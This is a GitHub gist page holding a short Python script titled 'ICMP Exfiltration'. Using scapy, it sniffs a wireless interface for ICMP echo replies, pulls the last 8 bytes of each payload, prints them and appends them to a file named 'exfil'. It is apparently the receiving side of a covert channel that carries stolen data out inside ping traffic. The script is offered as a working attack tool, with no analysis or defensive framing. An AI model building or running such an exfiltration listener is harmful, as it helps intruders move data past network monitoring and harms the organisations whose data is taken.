Skip to content

Instantly share code, notes, and snippets.

@outhex
Forked from maxrodrigo/icmp_exfiltration.py
Created September 29, 2021 00:41
Show Gist options
  • Save outhex/a49e5837a7b581569866dcd330733fb4 to your computer and use it in GitHub Desktop.
Save outhex/a49e5837a7b581569866dcd330733fb4 to your computer and use it in GitHub Desktop.
ICMP Exfiltration
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP
def process_packet(packet):
if packet.haslayer(ICMP) and packet[ICMP].type == 0:
data = packet[ICMP].load[-8:]
try:
print(f"{data.decode('utf-8')}", end="")
except UnicodeDecodeError:
pass
with open("./exfil", "a+b") as f:
f.write(data)
if __name__ == "__main__":
sniff(iface="wlp3s0", prn=process_packet)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment